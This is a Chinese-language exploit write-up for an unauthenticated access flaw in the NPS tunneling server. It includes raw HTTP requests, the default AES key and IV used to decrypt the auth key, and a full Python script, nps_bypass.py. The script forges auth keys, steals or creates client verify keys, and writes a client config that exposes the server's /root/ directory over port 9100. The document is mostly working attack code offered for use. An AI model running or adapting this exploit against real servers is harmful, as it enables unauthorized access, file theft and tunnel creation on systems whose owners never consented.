NPS未授权访问

nps未授权访问

根据GitHub上的脚本，得知auth_key基本都是本地MD5加密得来的，但在一些系统上测试失败，后来发现是本地和服务器的时间有问题，所以查了一下文档，发现有直接获取时间戳和加密密钥的地方。

1. POST /auth/gettime HTTP/1.1
2. Host: 192.168.70.250:18080
3. Content-Length: 7
4. Connection: close
5. Cookie:beegosessionID=xxxxx
6. ​
7. search=

返回一个json字段，里面包含服务器的时间戳。

1. POST /auth/getauthkey HTTP/1.1
2. Host: 192.168.70.250:18080
3. Content-Length: 7
4. Connection: close
5. Cookie:beegosessionID=xxxxx
6. ​
7. search=

返回加密的auth_key，这个key是配置文件内的key，也就是默认为注释掉的那个。并不能直接拿来使用，如果这个值为5acabcf051cd55abca03d18294422e01，说明为空，如果为其他说明被修改过，这时候就要算auth_crypt_key的值是不是也被修改了，如果没有则可以

1. AES-CBC pkcs5 128位 key=1234567812345678 iv=1234567812345678 hex

进行解密，也就是说至少要有一个auth_crypt_key没被修改或已知。

如果到此处可以未授权访问，那么就可以查看客户端信息，来获取VerifyKey，获取这个东西目的是为了把客户吨连接到服务端。也就是返回中的这一段值

1. "Id": 2,
2. "VerifyKey": "6sabs7dyn4rf1oob",
3. "Addr": "192.168.70.250",
4. "Remark": "",
5. "Status": true,
6. "IsConnect": true,

构造一个配置文件，其中的8024位默认的端口，需要在服务端的配置文件中修改，不对的话没事，访问首页去查看一下就行。

1. [common]
2. server_addr=1.1.1.1:8024
3. vkey=123
4. [file]
5. mode=file
6. server_port=9100
7. local_path=/root/
8. strip_pre=/web/

这样就可以把客户端加入，并且构造了一个访问服务端文件的地址。地址就会映射到本地文件系统上。

1. xxx:9100/web

编写一个脚本来统一这个过程。

1. #!/usr/bin/env python
2. # -*- coding: utf-8 -*-
3. # @Time : 2022/8/16 14:13
4. # @Author : misakikata
5. # @File : nps_bypass.py
6. # @Description : autoremove
7. ​
8. ​
9. import argparse
10. import requests
11. import json,sys
12. import hashlib
13. from Crypto.Cipher import AES
14. # from urllib.parse import urlparse
15. from binascii import a2b_hex
16. requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
17. ​
18. ​
19. ​
20. headers = {
21. "Cookie":"beegosessionID=2313ba62226729bf9bb0b9680da80a5f",
22. "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36",
23. "Content-Type":"application/x-www-form-urlencoded",
24. "Accept":"application/json, text/javascript, */*; q=0.01"
25. }
26. ​
27. file_w = """[common]
28. server_addr={host}:8024
29. vkey={vkey}
30. [file]
31. mode=file
32. server_port=9100
33. local_path=/root/
34. strip_pre=/web/
35. """
36. ​
37. def get_time(host):
38. url = host + "/auth/gettime"
39. r = requests.post(url, headers=headers, data={"search":""})
40. time = json.loads(r.text)['time']
41. return time
42. ​
43. ​
44. def gen_authkey(authkey, timestamp):
45. mdf = hashlib.md5()
46. mdf.update((authkey+str(timestamp)).encode('utf-8'))
47. auth_key = mdf.hexdigest()
48. return auth_key
49. ​
50. ​
51. def get_key(host):
52. url = host + "/auth/getauthkey"
53. r = requests.post(url, headers=headers, data={"search": ""})
54. key = json.loads(r.text)['crypt_auth_key']
55. if key == "5acabcf051cd55abca03d18294422e01":
56. authkey = ""
57. else:
58. if deco_key("1234567812345678", key):
59. authkey = deco_key("1234567812345678", key)
60. else:
61. return False
62. return authkey
63. ​
64. def add_to_16(value):
65. while len(value.encode('utf-8')) % 16 != 0:
66. value += '\x00'
67. return value.encode('utf-8')
68. ​
69. def deco_key(key0,data):
70. try:
71. aes = AES.new(key=add_to_16(key0), mode=AES.MODE_CBC, iv=key0.encode())
72. decryptedstr = aes.decrypt(a2b_hex(data)).decode().strip()
73. return decryptedstr
74. except:
75. return False
76. ​
77. ​
78. def gen_conf(host, vkey):
79. host = host.split(':')[0:2]
80. file = file_w.format(host=''.join(host), vkey=vkey)
81. with open("config.ini", 'w') as f:
82. f.write(file)
83. return True
84. ​
85. def get_vkey(host, data):
86. url = host + "/client/list"
87. r = requests.post(url, headers=headers, data=data)
88. if r.status_code == 200:
89. try:
90. vkey = json.loads(r.text)['rows'][0]['VerifyKey']
91. return vkey
92. except:
93. if gen_client(host, data):
94. print("无客户端，创建客户端成功")
95. r = requests.post(url, headers=headers, data=data)
96. vkey = json.loads(r.text)['rows'][0]['VerifyKey']
97. return vkey
98. else:
99. return False
100. else:
101. return False
102. ​
103. ​
104. def gen_client(host, data):
105. url = host + "/client/add"
106. data = "remark=&u=&p=&vkey=&config_conn_allow=1&compress=0&crypt=0&"+data
107. r = requests.post(url, headers=headers, data=data)
108. if r.status_code == 200:
109. if json.loads(r.text)['status'] == 1:
110. return True
111. return False
112. ​
113. def main(host):
114. times = get_time(host)
115. if get_key(host):
116. getkey = get_key(host)
117. else:
118. print(host+" 解密失败!")
119. sys.exit(0)
120. auth_key = gen_authkey(getkey, times)
121. data = "auth_key={auth_key}&timestamp={timestamp}&start=0&limit=10".format(auth_key=auth_key,timestamp=times)
122. r = requests.post(host, headers=headers, data=data)
123. if r.status_code == 200:
124. print(host+" is vuln!")
125. if get_vkey(host, data):
126. vkey = get_vkey(host, data)
127. if gen_conf(host, vkey):
128. print("请运行nps客户端命令：./npc -config=config.ini，并访问{host}:9100/web".format(host=''.join(host.split(':')[0:2])))
129. else:
130. print("未创建客户端或者获取失败！")
131. else:
132. print(host+" not is vuln!")
133. ​
134. if __name__ == '__main__':
135. parser = argparse.ArgumentParser(
136. description="NPS Bypass")
137. parser.add_argument('-u', '--url', type=str,
138. help="单个url检测，默认密钥进行解密")
139. args = parser.parse_args()
140. ​
141. if len(sys.argv) == 3:
142. if sys.argv[1] in ['-u', '--url']:
143. main(args.url)
144. else:
145. parser.print_help()